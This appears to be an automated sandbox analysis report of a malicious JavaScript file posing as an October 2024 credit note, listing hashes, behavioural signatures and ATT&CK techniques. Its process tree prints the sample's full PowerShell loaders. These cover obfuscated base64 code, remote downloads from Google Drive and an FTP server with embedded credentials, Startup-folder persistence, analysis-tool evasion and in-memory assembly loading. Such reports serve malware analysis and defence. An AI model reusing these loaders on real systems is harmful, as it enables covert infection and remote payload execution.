380f33fdb8df5c4848c2e50bc34d232178acb50bde94c58c1076196f876e7859

General

Target

INCENTIVES LAST WEEK CREDIT NOTE-OCT2024.js
Size

196KB
MD5

0dfe5dafeec713de2d6449c7980ac842
SHA1

61c9a5d13802e747a8feec2f88d3de52e32ca32c
SHA256

380f33fdb8df5c4848c2e50bc34d232178acb50bde94c58c1076196f876e7859
SHA512

ddda548c0ce78a29fa944312533dc01138a655e672af1bb5eb9c63823b0e3412b9c99ad4e643cf7916c6a57537bf8a55583f934b74c70fc68c9d6c19d4cb549a
SSDEEP

3072:AW1tKbWXt+NWXt+NWXt+NWXt+NWXt+NWXt+9DWXt+NWXt+NWXt+NWXt+NWXt+NWy:uz

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://drive.google.com/uc?export=download&id=

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
5	2804	powershell.exe
7	2804	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2432	powershell.exe
1320	powershell.exe
2804	powershell.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\INCENTIVES LAST WEEK CREDIT NOTE-OCT2024.js	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\INCENTIVES LAST WEEK CREDIT NOTE-OCT2024.js	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
5	drive.google.com
4	drive.google.com

Drops file in Windows directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Logs\DPX\setuperr.log	wusa.exe
File created	C:\Windows\wusa.lock	wusa.exe
File opened for modification	C:\Windows\Logs\DPX\setupact.log	wusa.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
1320	powershell.exe
2804	powershell.exe
3044	powershell.exe
2432	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	1320	powershell.exe
Token: SeDebugPrivilege	2804	powershell.exe
Token: SeDebugPrivilege	3044	powershell.exe
Token: SeDebugPrivilege	2432	powershell.exe

Suspicious use of WriteProcessMemory 15 IoCs

description	pid	Process	procid_target
PID 340 wrote to memory of 1320	340	wscript.exe	30
PID 340 wrote to memory of 1320	340	wscript.exe	30
PID 340 wrote to memory of 1320	340	wscript.exe	30
PID 1320 wrote to memory of 2804	1320	powershell.exe	32
PID 1320 wrote to memory of 2804	1320	powershell.exe	32
PID 1320 wrote to memory of 2804	1320	powershell.exe	32
PID 2804 wrote to memory of 3044	2804	powershell.exe	34
PID 2804 wrote to memory of 3044	2804	powershell.exe	34
PID 2804 wrote to memory of 3044	2804	powershell.exe	34
PID 3044 wrote to memory of 2704	3044	powershell.exe	35
PID 3044 wrote to memory of 2704	3044	powershell.exe	35
PID 3044 wrote to memory of 2704	3044	powershell.exe	35
PID 2804 wrote to memory of 2432	2804	powershell.exe	36
PID 2804 wrote to memory of 2432	2804	powershell.exe	36
PID 2804 wrote to memory of 2432	2804	powershell.exe	36

C:\Windows\system32\wscript.exe
wscript.exe "C:\Users\Admin\AppData\Local\Temp\INCENTIVES LAST WEEK CREDIT NOTE-OCT2024.js"
1⤵
- Suspicious use of WriteProcessMemory
PID:340
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $jPhaA = 'JA' + [char]66 + 'LAEEAVA' + [char]66 + 'pAGgAIAA9ACAAJA' + [char]66 + 'oAG8Acw' + [char]66 + '0AC4AVg' + [char]66 + 'lAHIAcw' + [char]66 + 'pAG8AbgAuAE0AYQ' + [char]66 + 'qAG8AcgAuAEUAcQ' + [char]66 + '1AGEAbA' + [char]66 + 'zACgAMgApADsASQ' + [char]66 + 'mACAAKAAgACQASw' + [char]66 + '' + [char]66 + 'AFQAaQ' + [char]66 + 'oACAAKQAgAHsAJA' + [char]66 + 'IAHoATw' + [char]66 + 'NAGoAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAEkATwAuAFAAYQ' + [char]66 + '0AGgAXQA6ADoARw' + [char]66 + 'lAHQAVA' + [char]66 + 'lAG0AcA' + [char]66 + 'QAGEAdA' + [char]66 + 'oACgAKQA7AGQAZQ' + [char]66 + 'sACAAKAAkAEgAeg' + [char]66 + 'PAE0AagAgACsAIAAnAFwAVQ' + [char]66 + 'wAHcAaQ' + [char]66 + 'uAC4AbQ' + [char]66 + 'zAHUAJwApADsAJA' + [char]66 + 'wAG4Acg' + [char]66 + 'kAHkAIAA9ACAAJw' + [char]66 + 'oAHQAdA' + [char]66 + 'wAHMAOgAvAC8AZA' + [char]66 + 'yAGkAdg' + [char]66 + 'lAC4AZw' + [char]66 + 'vAG8AZw' + [char]66 + 'sAGUALg' + [char]66 + 'jAG8AbQAvAHUAYwA/AGUAeA' + [char]66 + 'wAG8Acg' + [char]66 + '0AD0AZA' + [char]66 + 'vAHcAbg' + [char]66 + 'sAG8AYQ' + [char]66 + 'kACYAaQ' + [char]66 + 'kAD0AJwA7ACQAaw' + [char]66 + 'sAGsAQQ' + [char]66 + 'FACAAPQAgACQAZQ' + [char]66 + 'uAHYAOg' + [char]66 + 'QAFIATw' + [char]66 + 'DAEUAUw' + [char]66 + 'TAE8AUg' + [char]66 + 'fAEEAUg' + [char]66 + 'DAEgASQ' + [char]66 + 'UAEUAQw' + [char]66 + 'UAFUAUg' + [char]66 + 'FAC4AQw' + [char]66 + 'vAG4AdA' + [char]66 + 'hAGkAbg' + [char]66 + 'zACgAJwA2ADQAJwApADsAaQ' + [char]66 + 'mACAAKAAgACQAaw' + [char]66 + 'sAGsAQQ' + [char]66 + 'FACAAKQAgAHsAJA' + [char]66 + 'wAG4Acg' + [char]66 + 'kAHkAIAA9ACAAKAAkAHAAbg' + [char]66 + 'yAGQAeQAgACsAIAAnADEATg' + [char]66 + 'hAHEAZA' + [char]66 + 'OAFgAaQ' + [char]66 + 'HAHYASQ' + [char]66 + 'fAHEAMQ' + [char]66 + 'SAFAAaw' + [char]66 + 'hAHoARg' + [char]66 + '0AE0AeQ' + [char]66 + 'nAG0AYQ' + [char]66 + 'xAFQASg' + [char]66 + 'YAHUANAAyACcAKQAgADsAfQ' + [char]66 + 'lAGwAcw' + [char]66 + 'lACAAewAkAHAAbg' + [char]66 + 'yAGQAeQAgAD0AIAAoACQAcA' + [char]66 + 'uAHIAZA' + [char]66 + '5ACAAKwAgACcAMQ' + [char]66 + 'nADEAag' + [char]66 + 'tAFgAdQ' + [char]66 + 'zAFgAOQ' + [char]66 + 'tAGMAOQ' + [char]66 + 'WAG0AaA' + [char]66 + 'WAHIASg' + [char]66 + 'KADIAWA' + [char]66 + 'vAGYAWgAzAGEASw' + [char]66 + 'fAGMATA' + [char]66 + 'PAHQAJwApACAAOw' + [char]66 + '9ADsAJA' + [char]66 + 'xAHYAaw' + [char]66 + 'xAGYAIAA9ACAAKAAgAE4AZQ' + [char]66 + '3AC0ATw' + [char]66 + 'iAGoAZQ' + [char]66 + 'jAHQAIA' + [char]66 + 'OAGUAdAAuAFcAZQ' + [char]66 + 'iAEMAbA' + [char]66 + 'pAGUAbg' + [char]66 + '0ACAAKQAgADsAJA' + [char]66 + 'xAHYAaw' + [char]66 + 'xAGYALg' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAFQAZQ' + [char]66 + '4AHQALg' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAXQA6ADoAVQ' + [char]66 + 'UAEYAOAAgADsAJA' + [char]66 + 'xAHYAaw' + [char]66 + 'xAGYALg' + [char]66 + 'EAG8Adw' + [char]66 + 'uAGwAbw' + [char]66 + 'hAGQARg' + [char]66 + 'pAGwAZQAoACQAcA' + [char]66 + 'uAHIAZA' + [char]66 + '5ACwAIAAoACQASA' + [char]66 + '6AE8ATQ' + [char]66 + 'qACAAKwAgACcAXA' + [char]66 + 'VAHAAdw' + [char]66 + 'pAG4ALg' + [char]66 + 'tAHMAdQAnACkAIAApACAAOwAkAEoAbg' + [char]66 + '5AGcAbAAgAD0AIAAoACAAJw' + [char]66 + 'DADoAXA' + [char]66 + 'VAHMAZQ' + [char]66 + 'yAHMAXAAnACAAKwAgAFsARQ' + [char]66 + 'uAHYAaQ' + [char]66 + 'yAG8Abg' + [char]66 + 'tAGUAbg' + [char]66 + '0AF0AOgA6AFUAcw' + [char]66 + 'lAHIATg' + [char]66 + 'hAG0AZQAgACkAOw' + [char]66 + '0AGsAcA' + [char]66 + 'sAEIAIAA9ACAAKAAgACQASA' + [char]66 + '6AE8ATQ' + [char]66 + 'qACAAKwAgACcAXA' + [char]66 + 'VAHAAdw' + [char]66 + 'pAG4ALg' + [char]66 + 'tAHMAdQAnACAAKQAgADsAIA' + [char]66 + 'wAG8Adw' + [char]66 + 'lAHIAcw' + [char]66 + 'oAGUAbA' + [char]66 + 'sAC4AZQ' + [char]66 + '4AGUAIA' + [char]66 + '3AHUAcw' + [char]66 + 'hAC4AZQ' + [char]66 + '4AGUAIA' + [char]66 + '0AGsAcA' + [char]66 + 'sAEIAIAAvAHEAdQ' + [char]66 + 'pAGUAdAAgAC8Abg' + [char]66 + 'vAHIAZQ' + [char]66 + 'zAHQAYQ' + [char]66 + 'yAHQAIAA7ACAAQw' + [char]66 + 'vAHAAeQAtAEkAdA' + [char]66 + 'lAG0AIAAnACUARA' + [char]66 + 'DAFAASg' + [char]66 + 'VACUAJwAgAC0ARA' + [char]66 + 'lAHMAdA' + [char]66 + 'pAG4AYQ' + [char]66 + '0AGkAbw' + [char]66 + 'uACAAKAAgACQASg' + [char]66 + 'uAHkAZw' + [char]66 + 'sACAAKwAgACcAXA' + [char]66 + '' + [char]66 + 'AHAAcA' + [char]66 + 'EAGEAdA' + [char]66 + 'hAFwAUg' + [char]66 + 'vAGEAbQ' + [char]66 + 'pAG4AZw' + [char]66 + 'cAE0AaQ' + [char]66 + 'jAHIAbw' + [char]66 + 'zAG8AZg' + [char]66 + '0AFwAVw' + [char]66 + 'pAG4AZA' + [char]66 + 'vAHcAcw' + [char]66 + 'cAFMAdA' + [char]66 + 'hAHIAdAAgAE0AZQ' + [char]66 + 'uAHUAXA' + [char]66 + 'QAHIAbw' + [char]66 + 'nAHIAYQ' + [char]66 + 'tAHMAXA' + [char]66 + 'TAHQAYQ' + [char]66 + 'yAHQAdQ' + [char]66 + 'wACcAIAApACAALQ' + [char]66 + 'mAG8Acg' + [char]66 + 'jAGUAIAA7AHAAbw' + [char]66 + '3AGUAcg' + [char]66 + 'zAGgAZQ' + [char]66 + 'sAGwALg' + [char]66 + 'lAHgAZQAgAC0AYw' + [char]66 + 'vAG0AbQ' + [char]66 + 'hAG4AZAAgACcAcw' + [char]66 + 'sAGUAZQ' + [char]66 + 'wACAAMQA4ADAAJwA7ACAAcw' + [char]66 + 'oAHUAdA' + [char]66 + 'kAG8Adw' + [char]66 + 'uAC4AZQ' + [char]66 + '4AGUAIAAvAHIAIAAvAHQAIAAwACAALw' + [char]66 + 'mACAAfQ' + [char]66 + 'lAGwAcw' + [char]66 + 'lACAAew' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ATg' + [char]66 + 'lAHQALg' + [char]66 + 'TAGUAcg' + [char]66 + '2AGkAYw' + [char]66 + 'lAFAAbw' + [char]66 + 'pAG4AdA' + [char]66 + 'NAGEAbg' + [char]66 + 'hAGcAZQ' + [char]66 + 'yAF0AOgA6AFMAZQ' + [char]66 + 'yAHYAZQ' + [char]66 + 'yAEMAZQ' + [char]66 + 'yAHQAaQ' + [char]66 + 'mAGkAYw' + [char]66 + 'hAHQAZQ' + [char]66 + 'WAGEAbA' + [char]66 + 'pAGQAYQ' + [char]66 + '0AGkAbw' + [char]66 + 'uAEMAYQ' + [char]66 + 'sAGwAYg' + [char]66 + 'hAGMAawAgAD0AIA' + [char]66 + '7ACQAdA' + [char]66 + 'yAHUAZQ' + [char]66 + '9ACAAOw' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ATg' + [char]66 + 'lAHQALg' + [char]66 + 'TAGUAcg' + [char]66 + '2AGkAYw' + [char]66 + 'lAFAAbw' + [char]66 + 'pAG4AdA' + [char]66 + 'NAGEAbg' + [char]66 + 'hAGcAZQ' + [char]66 + 'yAF0AOgA6AFMAZQ' + [char]66 + 'jAHUAcg' + [char]66 + 'pAHQAeQ' + [char]66 + 'QAHIAbw' + [char]66 + '0AG8AYw' + [char]66 + 'vAGwAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAE4AZQ' + [char]66 + '0AC4AUw' + [char]66 + 'lAGMAdQ' + [char]66 + 'yAGkAdA' + [char]66 + '5AFAAcg' + [char]66 + 'vAHQAbw' + [char]66 + 'jAG8AbA' + [char]66 + 'UAHkAcA' + [char]66 + 'lAF0AOgA6AFQAbA' + [char]66 + 'zADEAMgAgADsAaQ' + [char]66 + 'mACgAKA' + [char]66 + 'nAGUAdAAtAHAAcg' + [char]66 + 'vAGMAZQ' + [char]66 + 'zAHMAIAAnAFcAaQ' + [char]66 + 'yAGUAcw' + [char]66 + 'oAGEAcg' + [char]66 + 'rACcALAAnAGEAcA' + [char]66 + 'hAHQAZQ' + [char]66 + 'EAE4AUwAnACwAJw' + [char]66 + 'hAG4AYQ' + [char]66 + 'sAHkAeg' + [char]66 + 'lACcAIAAtAGUAYQAgAFMAaQ' + [char]66 + 'sAGUAbg' + [char]66 + '0AGwAeQ' + [char]66 + 'DAG8Abg' + [char]66 + '0AGkAbg' + [char]66 + '1AGUAKQAgAC0AZQ' + [char]66 + 'xACAAJA' + [char]66 + 'OAHUAbA' + [char]66 + 'sACkAewAgAA0ACgAgACAAIAAgACAAIAAgAA0ACg' + [char]66 + '9AA0ACgANAAoAZQ' + [char]66 + 'sAHMAZQ' + [char]66 + '7ACAADQAKAFIAZQ' + [char]66 + 'zAHQAYQ' + [char]66 + 'yAHQALQ' + [char]66 + 'DAG8AbQ' + [char]66 + 'wAHUAdA' + [char]66 + 'lAHIAIAAtAGYAbw' + [char]66 + 'yAGMAZQAgADsADQAKACAAIAAgACAAIAAgAGUAeA' + [char]66 + 'pAHQAIAA7AA0ACgAgAH0AIAA7ACQAYQ' + [char]66 + '' + [char]66 + 'AEEASQ' + [char]66 + 'lACAAPQAgACgAJw' + [char]66 + 'mAHQAcAA6AC8ALw' + [char]66 + 'kAGUAcw' + [char]66 + 'jAGsAdg' + [char]66 + 'iAHIAYQ' + [char]66 + '0ADEAQA' + [char]66 + 'mAHQAcAAuAGQAZQ' + [char]66 + 'zAGMAaw' + [char]66 + '2AGIAcg' + [char]66 + 'hAHQALg' + [char]66 + 'jAG8AbQAuAGIAcgAvAFUAcA' + [char]66 + 'jAHIAeQ' + [char]66 + 'wAHQAZQ' + [char]66 + 'yACcAIAArACAAJwAvADAAMgAvAEQATA' + [char]66 + 'MADAAMQAuAHQAeA' + [char]66 + '0ACcAKQAgADsAJA' + [char]66 + 'ZAEQASw' + [char]66 + 'lAEIAIAA9ACAAKA' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ASQ' + [char]66 + 'PAC4AUA' + [char]66 + 'hAHQAaA' + [char]66 + 'dADoAOg' + [char]66 + 'HAGUAdA' + [char]66 + 'UAGUAbQ' + [char]66 + 'wAFAAYQ' + [char]66 + '0AGgAKAApACAAKwAgACcAZA' + [char]66 + 'sAGwAMAAxAC4AdA' + [char]66 + '4AHQAJwApADsAIAAkAGMAcg' + [char]66 + 'lAGQAZQ' + [char]66 + 'uAHQAaQ' + [char]66 + 'hAGwAIAA9ACAAKA' + [char]66 + 'OAGUAdwAtAE8AYg' + [char]66 + 'qAGUAYw' + [char]66 + '0ACAAUA' + [char]66 + 'TAEMAcg' + [char]66 + 'lAGQAZQ' + [char]66 + 'uAHQAaQ' + [char]66 + 'hAGwAKAAoAC0Aag' + [char]66 + 'vAGkAbgAgAFsAYw' + [char]66 + 'oAGEAcg' + [char]66 + 'bAF0AXQAoADEAMAAwACwAMQAwADEALAAxADEANQAsADkAOQAsADEAMAA3ACwAMQAxADgALAA5ADgALAAxADEANAAsADkANwAsADEAMQA2ACwANAA5ACkAKQAsACAAKA' + [char]66 + 'DAG8Abg' + [char]66 + '2AGUAcg' + [char]66 + '0AFQAbwAtAFMAZQ' + [char]66 + 'jAHUAcg' + [char]66 + 'lAFMAdA' + [char]66 + 'yAGkAbg' + [char]66 + 'nACAALQ' + [char]66 + '' + [char]66 + 'AHMAUA' + [char]66 + 'sAGEAaQ' + [char]66 + 'uAFQAZQ' + [char]66 + '4AHQAIAAtAEYAbw' + [char]66 + 'yAGMAZQAgAC0AUw' + [char]66 + '0AHIAaQ' + [char]66 + 'uAGcAIAAoAC0Aag' + [char]66 + 'vAGkAbgAgAFsAYw' + [char]66 + 'oAGEAcg' + [char]66 + 'bAF0AXQAoADEAMAA5ACwAIAAxADAAMgAsACAAMQAxADAALAAgADYAOQAsACAAMQAwADAALAAgADcANwAsACAANgA4ACwAIAA3ADYALAAgADEAMQAwACwAIAA2ADkALAAgADYANAAsACAANgA0ACwAIAA0ADkALAAgADUAMwAsACAANQA1ACwAIAA1ADYAIAApACkAKQApACkAOwA7AEkAbg' + [char]66 + '2AG8Aaw' + [char]66 + 'lAC0AVw' + [char]66 + 'lAGIAUg' + [char]66 + 'lAHEAdQ' + [char]66 + 'lAHMAdAAgAC0AVQ' + [char]66 + 'SAEkAIAAkAGEAQQ' + [char]66 + '' + [char]66 + 'AEkAZQAgAC0ATw' + [char]66 + '1AHQARg' + [char]66 + 'pAGwAZQAgACQAWQ' + [char]66 + 'EAEsAZQ' + [char]66 + 'CACAALQ' + [char]66 + 'DAHIAZQ' + [char]66 + 'kAGUAbg' + [char]66 + '0AGkAYQ' + [char]66 + 'sACAAJA' + [char]66 + 'jAHIAZQ' + [char]66 + 'kAGUAbg' + [char]66 + '0AGkAYQ' + [char]66 + 'sACAALQ' + [char]66 + 'VAHMAZQ' + [char]66 + 'CAGEAcw' + [char]66 + 'pAGMAUA' + [char]66 + 'hAHIAcw' + [char]66 + 'pAG4AZwAgADsAYw' + [char]66 + 'tAGQALg' + [char]66 + 'lAHgAZQAgAC8AYwAgADsAcA' + [char]66 + 'pAG4AZwAgADEAMgA3AC4AMAAuADAALgAxACAAOw' + [char]66 + 'wAG8Adw' + [char]66 + 'lAHIAcw' + [char]66 + 'oAGUAbA' + [char]66 + 'sAC4AZQ' + [char]66 + '4AGUAIAAtAGMAbw' + [char]66 + 'tAG0AYQ' + [char]66 + 'uAGQAIA' + [char]66 + '7ACQAWQ' + [char]66 + 'EAEsAZQ' + [char]66 + 'CACAAPQAgACgAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAEkATwAuAFAAYQ' + [char]66 + '0AGgAXQA6ADoARw' + [char]66 + 'lAHQAVA' + [char]66 + 'lAG0AcA' + [char]66 + 'QAGEAdA' + [char]66 + 'oACgAKQAgACsAIAAnAGQAbA' + [char]66 + 'sADAAMQAuAHQAeA' + [char]66 + '0ACcAKQAgADsAJA' + [char]66 + 'jAHoAcg' + [char]66 + 'sAGwAIAA9ACAAKAAgAEcAZQ' + [char]66 + '0AC0AQw' + [char]66 + 'vAG4AdA' + [char]66 + 'lAG4AdAAgAC0AUA' + [char]66 + 'hAHQAaAAgACQAWQ' + [char]66 + 'EAEsAZQ' + [char]66 + 'CACAAKQAgADsASQ' + [char]66 + 'uAHYAbw' + [char]66 + 'rAGUALQ' + [char]66 + 'XAGUAYg' + [char]66 + 'SAGUAcQ' + [char]66 + '1AGUAcw' + [char]66 + '0ACAALQ' + [char]66 + 'VAFIASQAgACQAYw' + [char]66 + '6AHIAbA' + [char]66 + 'sACAALQ' + [char]66 + 'PAHUAdA' + [char]66 + 'GAGkAbA' + [char]66 + 'lACAAJA' + [char]66 + 'ZAEQASw' + [char]66 + 'lAEIAIAAtAFUAcw' + [char]66 + 'lAEIAYQ' + [char]66 + 'zAGkAYw' + [char]66 + 'QAGEAcg' + [char]66 + 'zAGkAbg' + [char]66 + 'nAH0AIAA7ACQAcQ' + [char]66 + 'hAHEAeA' + [char]66 + 'FACAAPQAgACgAIA' + [char]66 + 'HAGUAdAAtAEMAbw' + [char]66 + 'uAHQAZQ' + [char]66 + 'uAHQAIAAtAFAAYQ' + [char]66 + '0AGgAIAAkAFkARA' + [char]66 + 'LAGUAQgAgAC0ARQ' + [char]66 + 'uAGMAbw' + [char]66 + 'kAGkAbg' + [char]66 + 'nACAAVQ' + [char]66 + 'UAEYAOAApACAAOw' + [char]66 + 'bAEIAeQ' + [char]66 + '0AGUAWw' + [char]66 + 'dAF0AIAAkAGQAQw' + [char]66 + 'pAFcAegAgAD0AIA' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4AQw' + [char]66 + 'vAG4Adg' + [char]66 + 'lAHIAdA' + [char]66 + 'dADoAOg' + [char]66 + 'GAHIAbw' + [char]66 + 'tAEIAYQ' + [char]66 + 'zAGUANgA0AFMAdA' + [char]66 + 'yAGkAbg' + [char]66 + 'nACgAIAAkAHEAYQ' + [char]66 + 'xAHgARQAuAFIAZQ' + [char]66 + 'wAGwAYQ' + [char]66 + 'jAGUAKAAgACcAkyE6AJMhJwAgACwAIAAnAEEAJwAgACkAIAApACAAOwAkAG4Aag' + [char]66 + 'jAGIAcQAgAD0AIAAnAEMAbA' + [char]66 + 'hAHMAcw' + [char]66 + 'MAGkAYg' + [char]66 + 'yAGEAcg' + [char]66 + '5ADMALgAnACAAOwAkAEwATA' + [char]66 + 'RAHUAZAAgAD0AIAAnAEMAbA' + [char]66 + 'hAHMAcwAxACcAIAA7ACQAbg' + [char]66 + 'lAFUAbQ' + [char]66 + 'WACAAPQAgACcAcA' + [char]66 + 'yAEYAVg' + [char]66 + 'JACcAIAA7AFsAUw' + [char]66 + '5AHMAdA' + [char]66 + 'lAG0ALg' + [char]66 + '' + [char]66 + 'AHAAcA' + [char]66 + 'EAG8AbQ' + [char]66 + 'hAGkAbg' + [char]66 + 'dADoAOg' + [char]66 + 'DAHUAcg' + [char]66 + 'yAGUAbg' + [char]66 + '0AEQAbw' + [char]66 + 'tAGEAaQ' + [char]66 + 'uAC4ATA' + [char]66 + 'vAGEAZAAoACAAJA' + [char]66 + 'kAEMAaQ' + [char]66 + 'XAHoAIAApAC4ARw' + [char]66 + 'lAHQAVA' + [char]66 + '5AHAAZQAoACAAJA' + [char]66 + 'uAGoAYw' + [char]66 + 'iAHEAIAArACAAJA' + [char]66 + 'MAEwAUQ' + [char]66 + '1AGQAIAApAC4ARw' + [char]66 + 'lAHQATQ' + [char]66 + 'lAHQAaA' + [char]66 + 'vAGQAKAAgACQAbg' + [char]66 + 'lAFUAbQ' + [char]66 + 'WACAAKQAuAEkAbg' + [char]66 + '2AG8Aaw' + [char]66 + 'lACgAJA' + [char]66 + 'uAHUAbA' + [char]66 + 'sACwAIA' + [char]66 + 'bAG8AYg' + [char]66 + 'qAGUAYw' + [char]66 + '0AFsAXQ' + [char]66 + 'dACAAKAAgACcAMAAvAGgANw' + [char]66 + 'SAEsASgAvAHIALw' + [char]66 + 'lAGUALg' + [char]66 + 'lAHQAcw' + [char]66 + 'hAHAALwAvADoAcw' + [char]66 + 'wAHQAdA' + [char]66 + 'oACcAIAAsACAAJwAlAEQAQw' + [char]66 + 'QAEoAVQAlACcALAAgACcARAAgAEQAMQ' + [char]66 + 'EAEEAZA' + [char]66 + 'kAEkAbg' + [char]66 + 'QAHIAbw' + [char]66 + 'jAGUAcw' + [char]66 + 'zADMAMgAnACAAKQAgACkAIAA7AH0AOwA=';$jPhaA = $jPhaA.replace('革','B') ;$jPhaA = [System.Convert]::FromBase64String( $jPhaA ) ;;;$jPhaA = [System.Text.Encoding]::Unicode.GetString( $jPhaA ) ;$jPhaA = $jPhaA.replace('%DCPJU%','C:\Users\Admin\AppData\Local\Temp\INCENTIVES LAST WEEK CREDIT NOTE-OCT2024.js') ;powershell $jPhaA
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1320
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$KATih = $host.Version.Major.Equals(2);If ( $KATih ) {$HzOMj = [System.IO.Path]::GetTempPath();del ($HzOMj + '\Upwin.msu');$pnrdy = 'https://drive.google.com/uc?export=download&id=';$klkAE = $env:PROCESSOR_ARCHITECTURE.Contains('64');if ( $klkAE ) {$pnrdy = ($pnrdy + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$pnrdy = ($pnrdy + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$qvkqf = ( New-Object Net.WebClient ) ;$qvkqf.Encoding = [System.Text.Encoding]::UTF8 ;$qvkqf.DownloadFile($pnrdy, ($HzOMj + '\Upwin.msu') ) ;$Jnygl = ( 'C:\Users\' + [Environment]::UserName );tkplB = ( $HzOMj + '\Upwin.msu' ) ; powershell.exe wusa.exe tkplB /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\INCENTIVES LAST WEEK CREDIT NOTE-OCT2024.js' -Destination ( $Jnygl + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;if((get-process 'Wireshark','apateDNS','analyze' -ea SilentlyContinue) -eq $Null){ } else{ Restart-Computer -force ; exit ; } ;$aAAIe = ('ftp://[email protected]/Upcrypter' + '/02/DLL01.txt') ;$YDKeB = ([System.IO.Path]::GetTempPath() + 'dll01.txt'); $credential = (New-Object PSCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)), (ConvertTo-SecureString -AsPlainText -Force -String (-join [char[]](109, 102, 110, 69, 100, 77, 68, 76, 110, 69, 64, 64, 49, 53, 55, 56 )))));;Invoke-WebRequest -URI $aAAIe -OutFile $YDKeB -Credential $credential -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$YDKeB = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$czrll = ( Get-Content -Path $YDKeB ) ;Invoke-WebRequest -URI $czrll -OutFile $YDKeB -UseBasicParsing} ;$qaqxE = ( Get-Content -Path $YDKeB -Encoding UTF8) ;[Byte[]] $dCiWz = [System.Convert]::FromBase64String( $qaqxE.Replace( '↓:↓' , 'A' ) ) ;$njcbq = 'ClassLibrary3.' ;$LLQud = 'Class1' ;$neUmV = 'prFVI' ;[System.AppDomain]::CurrentDomain.Load( $dCiWz ).GetType( $njcbq + $LLQud ).GetMethod( $neUmV ).Invoke($null, [object[]] ( '0/h7RKJ/r/ee.etsap//:sptth' , 'C:\Users\Admin\AppData\Local\Temp\INCENTIVES LAST WEEK CREDIT NOTE-OCT2024.js', 'D D1DAddInProcess32' ) ) ;};"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Drops startup file
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2804
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" wusa.exe tkplB /quiet /norestart
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3044
    - - C:\Windows\system32\wusa.exe
        
        "C:\Windows\system32\wusa.exe" tkplB /quiet /norestart
        5⤵
        Drops file in Windows directory
        
        PID:2704
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "sleep 180"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2432

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

2

T1059

JavaScript

1

T1059.007

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
3bafba7115a0e2a05be05ae90aeb706a

SHA1
fc55420031fb2780fc06b38a60a1d78c41c3e378

SHA256
e8c30935e45d404b86928bc7637cb1d0761514070e34a845c3d665373b171825

SHA512
6dc51b04d4172c00988e3f8fe6cd359a68381c6f4cd84e33b59de4df3db232200cc1651aabe222a87940cfe64a1297c80faa9decc469fce1b31567f1a5b40e12

Download Submit
